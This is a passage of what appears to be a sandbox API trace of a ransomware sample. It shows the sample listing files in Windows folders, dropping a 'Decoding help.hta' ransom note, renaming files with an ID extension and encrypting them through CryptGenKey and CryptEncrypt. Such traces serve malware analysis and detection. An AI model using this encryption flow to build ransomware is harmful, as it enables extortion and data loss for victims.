lpFindFileData=0x4c8fd30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x940c2a00, ftCreationTime.dwHighDateTime=0x1cad01b, ftLastAccessTime.dwLowDateTime=0x940c2a00, ftLastAccessTime.dwHighDateTime=0x1cad01b, ftLastWriteTime.dwLowDateTime=0xfe09b760, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x10b2, dwReserved0=0x0, dwReserved1=0x0, cFileName="Office32WW.xml", cAlternateFileName="OFFICE~1.XML")) returned 1 [0053.110] lstrcpyW (in: lpString1=0x3380118, lpString2="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\*.*" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\*.*") returned="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\*.*" [0053.110] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\*.*") returned 70 [0053.110] lstrcatW (in: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Decoding help.hta") returned="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Decoding help.hta" [0053.110] GetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Decoding help.hta" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\decoding help.hta")) returned 0x1 [0053.110] lstrcmpiW (lpString1="Decoding help.hta", lpString2="Office32WW.xml") returned -1 [0053.110] lstrlenW (lpString="Office32WW.xml") returned 14 [0053.110] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\*.*" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\*.*") returned="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\*.*" [0053.110] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\*.*") returned 70 [0053.110] lstrcatW (in: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\", lpString2="Office32WW.xml" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.xml" [0053.110] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.xml" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.xml" [0053.111] lstrcatW (in: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.xml", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.xml.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.xml.[ID]g9uZrLhJaygpwRm1[ID]" [0053.111] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.xml" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\office32ww.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.xml.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\office32ww.xml.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0053.111] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.xml.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\office32ww.xml.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4e0 [0053.111] CreateFileMappingA (hFile=0x4e0, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x384 [0053.112] CryptAcquireContextA (in: phProv=0x4c8fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x4c8fcec*=0x3449e80) returned 1 [0054.981] CryptGenKey (in: hProv=0x3449e80, Algid=0x6610, dwFlags=0x1, phKey=0x4c8fce8 | out: phKey=0x4c8fce8*=0x5d85d0) returned 1 [0054.982] CryptExportKey (in: hKey=0x5d85d0, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x4c8fbe4, pdwDataLen=0x4c8fce4 | out: pbData=0x4c8fbe4*, pdwDataLen=0x4c8fce4*=0x2c) returned 1 [0054.982] MapViewOfFile (hFileMappingObject=0x384, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x10a0) returned 0x2d0000 [0054.991] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4c8fbe4*, pdwDataLen=0x4c8fcf8*=0x40, dwBufLen=0x100 | out: pbData=0x4c8fbe4*, pdwDataLen=0x4c8fcf8*=0x100) returned 1 [0054.991] CryptEncrypt (in: hKey=0x5d85d0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2d0000, pdwDataLen=0x4c8fce4*=0x10a0, dwBufLen=0x10a0 | out: pbData=0x2d0000*, pdwDataLen=0x4c8fce4*=0x10a0) returned 1 [0054.991] UnmapViewOfFile (lpBaseAddress=0x2d0000) returned 1 [0054.993] CloseHandle (hObject=0x384) returned 1 [0054.993] CryptDestroyKey (hKey=0x5d85d0) returned 1 [0054.993] CryptReleaseContext (hProv=0x3449e80, dwFlags=0x0) returned 1 [0054.993] SetFilePointerEx (in: hFile=0x4e0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0054.993] WriteFile (in: hFile=0x4e0, lpBuffer=0x4c8fbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x4c8fcf8, lpOverlapped=0x0 | out: lpBuffer=0x4c8fbe4*, lpNumberOfBytesWritten=0x4c8fcf8*=0x100, lpOverlapped=0x0) returned 1 [0056.951] WriteFile (in: hFile=0x4e0, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0x4c8fcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0x4c8fcf8*=0x500, lpOverlapped=0x0) returned 1 [0056.951] CloseHandle (hObject=0x4e0) returned 1 [0056.951] SetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.xml.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0058.511] FindNextFileW (in: hFindFile=0x5d7e10, lpFindFileData=0x4c8fd30 | out: lpFindFileData=0x4c8fd30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xf885a000, ftCreationTime.dwHighDateTime=0x1cac4d7, ftLastAccessTime.dwLowDateTime=0xf885a000, ftLastAccessTime.dwHighDateTime=0x1cac4d7, ftLastWriteTime.dwLowDateTime=0x17c42c30, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x2a968, dwReserved0=0x0, dwReserved1=0x0, cFileName="ose.exe", cAlternateFileName="")) returned 1 [0058.511] lstrcpyW (in: lpString1=0x2a6a0048, lpString2="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\*.*" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\*.*") returned="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\*.*" [0058.511] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\*.*") returned 70 [0058.511] lstrcatW (in: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Decoding help.hta") returned="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Decoding help.hta" [0058.512] GetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Decoding help.hta" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\decoding help.hta")) returned 0x1 [0058.512] lstrcmpiW (lpString1="Decoding help.hta", lpString2="ose.exe") returned -1 [0058.512] lstrlenW (lpString="ose.exe") returned 7 [0058.512] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\*.*" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\*.*") returned="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\*.*" [0058.512] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\*.*") returned 70 [0058.512] lstrcatW (in: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\", lpString2="ose.exe" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ose.exe") returned="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ose.exe" [0058.512] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ose.exe" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ose.exe") returned="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ose.exe" [0058.512] lstrcatW (in: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ose.exe", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ose.exe.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ose.exe.[ID]g9uZrLhJaygpwRm1[ID]" [0058.512] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ose.exe" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\ose.exe"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ose.exe.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\ose.exe.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0061.616] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ose.exe.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\ose.exe.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xe1c [0061.616] CreateFileMappingA (hFile=0xe1c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xe20 [0061.616] CryptAcquireContextA (phProv=0x4c8fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000) Thread: id = 145 os_tid = 0x204 [0040.225] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\en-US\\*.*", lpFindFileData=0x4dcfd30 | out: lpFindFileData=0x4dcfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1ea40f84, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x228ba44f, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ea6723d, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5a5870 [0040.226] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0040.226] FindNextFileW (in: hFindFile=0x5a5870, lpFindFileData=0x4dcfd30 | out: lpFindFileData=0x4dcfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1ea40f84, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x228ba44f, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ea6723d, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0040.226] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0040.226] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0040.226] FindNextFileW (in: hFindFile=0x5a5870, lpFindFileData=0x4dcfd30 | out: lpFindFileData=0x4dcfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x128de43b, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x12aa84e7, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x128de43b, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0xa00, dwReserved0=0x0, dwReserved1=0x0, cFileName="hmmapi.dll.mui", cAlternateFileName="")) returned 1 [0040.226] lstrcpyW (in: lpString1=0x10d06a10, lpString2="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\en-US\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\en-US\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\en-US\\*.*" [0040.226] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\en-US\\*.*") returned 54 [0040.226] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\en-US\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\en-US\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\en-US\\Decoding help.hta" [0040.226] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\en-US\\Decoding help.hta" (normalized: "c:\\program files (x86)\\internet explorer\\en-us\\decoding help.hta")) returned 0xffffffff [0040.226] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\en-US\\Decoding help.hta" (normalized: "c:\\program files (x86)\\internet explorer\\en-us\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x314 [0040.760] WriteFile (in: hFile=0x314, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x4dcfcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x4dcfcf8*=0x78e, lpOverlapped=0x0) returned 1 [0040.761] CloseHandle (hObject=0x314) returned 1 [0040.761] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\en-US\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0041.127] lstrcmpiW (lpString1="Decoding help.hta", lpString2="hmmapi.dll.mui") returned -1 [0041.127] lstrlenW (lpString="hmmapi.dll.mui") returned 14 [0041.127] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\en-US\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\en-US\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\en-US\\*.*" [0041.127] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\en-US\\*.*") returned 54 [0041.127] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\en-US\\", lpString2="hmmapi.dll.mui" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\en-US\\hmmapi.dll.mui") returned="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\en-US\\hmmapi.dll.mui" [0041.127] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\en-US\\hmmapi.dll.mui" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\en-US\\hmmapi.dll.mui") returned="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\en-US\\hmmapi.dll.mui" [0041.127] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\en-US\\hmmapi.dll.mui", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\en-US\\hmmapi.dll.mui.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\en-US\\hmmapi.dll.mui.[ID]g9uZrLhJaygpwRm1[ID]" [0041.127] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\en-US\\hmmapi.dll.mui" (normalized: "c:\\program files (x86)\\internet explorer\\en-us\\hmmapi.dll.mui"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\en-US\\hmmapi.dll.mui.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\internet explorer\\en-us\\hmmapi.dll.mui.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0041.136] FindNextFileW (in: hFindFile=0x5a5870, lpFindFileData=0x4dcfd30 | out: lpFindFileData=0x4dcfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x128de43b, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x12aa84e7, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x128de43b, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x7000, dwReserved0=0x0, dwReserved1=0x0, cFileName="iedvtool.dll.mui", cAlternateFileName="")) returned 1 [0041.136] lstrcpyW (in: lpString1=0x42b0868, lpString2="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\en-US\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\en-US\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\en-US\\*.*" [0041.136] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\en-US\\*.*") returned 54 [0041.136] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\en-US\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\en-US\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\en-US\\Decoding help.hta" [0041.137] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\en-US\\Decoding help.hta" (normalized: "c:\\program files (x86)\\internet explorer\\en-us\\decoding help.hta")) returned 0x1 [0041.137] lstrcmpiW (lpString1="Decoding help.hta", lpString2="iedvtool.dll.mui") returned -1 [0041.137] lstrlenW (lpString="iedvtool.dll.mui") returned 16 [0041.137] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\en-US\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\en-US\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\en-US\\*.*" [0041.137] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\en-US\\*.*") returned 54 [0041.137] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\en-US\\", lpString2="iedvtool.dll.mui" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\en-US\\iedvtool.dll.mui") returned="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\en-US\\iedvtool.dll.mui" [0041.137] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\en-US\\iedvtool.dll.mui" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\en-US\\iedvtool.dll.mui") returned="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\en-US\\iedvtool.dll.mui" [0041.137] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\en-US\\iedvtool.dll.mui", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\en-US\\iedvtool.dll.mui.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\en-US\\iedvtool.dll.mui.[ID]g9uZrLhJaygpwRm1[ID]" [0041.137] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\en-US\\iedvtool.dll.mui" (normalized: "c:\\program files (x86)\\internet explorer\\en-us\\iedvtool.dll.mui"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\en-US\\iedvtool.dll.mui.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\internet explorer\\en-us\\iedvtool.dll.mui.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0041.137] FindNextFileW (in: hFindFile=0x5a5870, lpFindFileData=0x4dcfd30 | out: lpFindFileData=0x4dcfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x128de43b, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x12aa84e7, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x128de43b, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x800, dwReserved0=0x0, dwReserved1=0x0, cFileName="ieinstal.exe.mui", cAlternateFileName="")) returned 1 [0041.137] lstrcpyW (in: lpString1=0x42b0868, lpString2="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\en-US\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\en-US\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\en-US\\*.*" [0041.137] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\en-US\\*.*") returned 54 [0041.137] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\en-US\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\en-US\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\en-US\\Decoding help.hta" [0041.137] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\en-US\\Decoding help.hta" (normalized: "c:\\program files (x86)\\internet explorer\\en-us\\decoding help.hta")) returned 0x1 [0041.137] lstrcmpiW (lpString1="Decoding help.hta", lpString2="ieinstal.exe.mui") returned -1 [0041.137] lstrlenW (lpString="ieinstal.exe.mui") returned 16 [0041.137] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\en-US\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\en-US\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\en-US\\*.*" [0041.138] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\en-US\\*.*") returned 54 [0041.138] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\en-US\\", lpString2="ieinstal.exe.mui" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\en-US\\ieinstal.exe.mui") returned="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\en-US\\ieinstal.exe.mui" [0041.138] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\en-US\\ieinstal.exe.mui" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\en-US\\ieinstal.exe.mui") returned="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\en-US\\ieinstal.exe.mui" [0041.138] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\en-US\\ieinstal.exe.mui", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\en-US\\ieinstal.exe.mui.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\en-US\\ieinstal.exe.mui.[ID]g9uZrLhJaygpwRm1[ID]" [0041.138] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\en-US\\ieinstal.exe.mui" (normalized: "c:\\program files (x86)\\internet explorer\\en-us\\ieinstal.exe.mui"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\en-US\\ieinstal.exe.mui.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\internet explorer\\en-us\\ieinstal.exe.mui.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0041.138] FindNextFileW (in: hFindFile=0x5a5870, lpFindFileData=0x4dcfd30 | out: lpFindFileData=0x4dcfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x128b8182, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x12aa84e7, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x128b8182, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x800, dwReserved0=0x0, dwReserved1=0x0, cFileName="ielowutil.exe.mui", cAlternateFileName="")) returned 1 [0041.138] lstrcpyW (in: lpString1=0x42b0868, lpString2="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\en-US\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\en-US\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\en-US\\*.*" [0041.138] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\en-US\\*.*") returned 54 [0041.138] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\en-US\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\en-US\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\en-US\\Decoding help.hta" [0041.138] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Internet Explorer\\en-US\\Decoding help.hta" (normalized: "c:\\program files (x86)\\internet explorer\\en-us\\decoding help.hta")) returned 0x1 [0041.138] lstrcmpiW (lpString1="Decoding help.hta", lpString2="ielowutil.exe.mui") returned -1 [0041.138] lstrlenW (lpString="ielowutil.exe.mui") returned 17 [0041.138] lstrcatW (in: lpString1="", 